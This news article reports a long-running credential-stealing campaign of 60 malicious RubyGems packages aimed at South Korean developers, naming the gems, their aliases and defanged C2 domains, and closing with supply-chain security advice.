The RubyGems ecosystem, a cornerstone of the Ruby development community, has been systematically compromised by a long-running credential theft campaign. Security researchers at Socket have exposed 60 malicious gems downloaded over 275,000 times since March 2023, posing a severe supply chain threat primarily targeting South Korean developers using automation tools.

Article illustration 1

Deceptive Packages, Real Theft
Published under aliases like zon, nowon, kwonsoonje, and soonje, the gems masqueraded as legitimate tools for interacting with popular platforms:

  • Social Media/Tools: wp_posting_duo, wp_posting_zon (WordPress), tg_send_duo, tg_send_zon (Telegram)
  • SEO/Blogging: backlink_zon, back_duo, nblog_duo, nblog_zon, tblog_duopack
  • Naver/Kakao: cafe_basics_duo, cafe_buy_duo, *_blog_comment, *_cafe_comment

These gems presented convincing graphical user interfaces (GUIs) mimicking their advertised functionality. However, beneath the surface lurked malicious code designed for one purpose: credential exfiltration.

The Attack Mechanism
Upon execution, the gems acted as sophisticated phishing tools. When users entered credentials into the seemingly legitimate login forms:

  1. Data Harvesting: Usernames, passwords (in plaintext), device MAC addresses (for fingerprinting), and the specific package name were captured.
  2. Exfiltration: Data was sent to hardcoded command-and-control (C2) servers like programzon[.]com, appspace[.]kr, and marketingduo[.]co[.]kr.
  3. Deception: Users often received fake success or failure messages, while no actual API call to the intended service occurred.
Article illustration 2

Malicious code snippet responsible for credential theft found in the gems. (Source: Socket)

Socket researchers confirmed the real-world impact by discovering harvested credential logs on Russian-speaking darknet markets, directly linked to traffic from marketingduo[.]co[.]kr.

Article illustration 3

Infostealer logs on darknet markets linked to the RubyGems campaign. (Source: Socket)

An Enduring Threat and Ecosystem Vulnerability
This incident is not isolated. Socket previously reported typosquatting attacks against Fastlane tools on RubyGems in June. Alarmingly, despite Socket reporting all 60 malicious gems:

"At least 16 of the 60 malicious Ruby gems remain available..."

This persistence highlights the ongoing challenge of promptly purging malicious actors from open-source repositories.

Mitigating Supply Chain Risk
This campaign underscores critical security practices for developers:

  1. Scrutinize Dependencies: Vigilantly examine libraries, especially lesser-known ones, for suspicious code (e.g., obfuscation, unexpected network calls).
  2. Assess Publisher Reputation: Check the publisher's history, other packages, and overall account legitimacy on the repository.
  3. Lock Dependencies: Pin dependencies to specific, vetted versions (known to be safe) to prevent automatic updates to potentially malicious new releases.
  4. Leverage Security Tooling: Utilize tools like Socket that proactively analyze packages for risk signals beyond just known vulnerabilities.

The discovery of hundreds of thousands of downloads over years demonstrates how effectively attackers exploit trust within open-source ecosystems. As RubyGems works to remove the remaining threats, developers must adopt a more defensive stance, recognizing that the convenience of package managers now comes with an inherent responsibility for rigorous security hygiene. The safety of your credentials, and potentially your infrastructure, depends on it.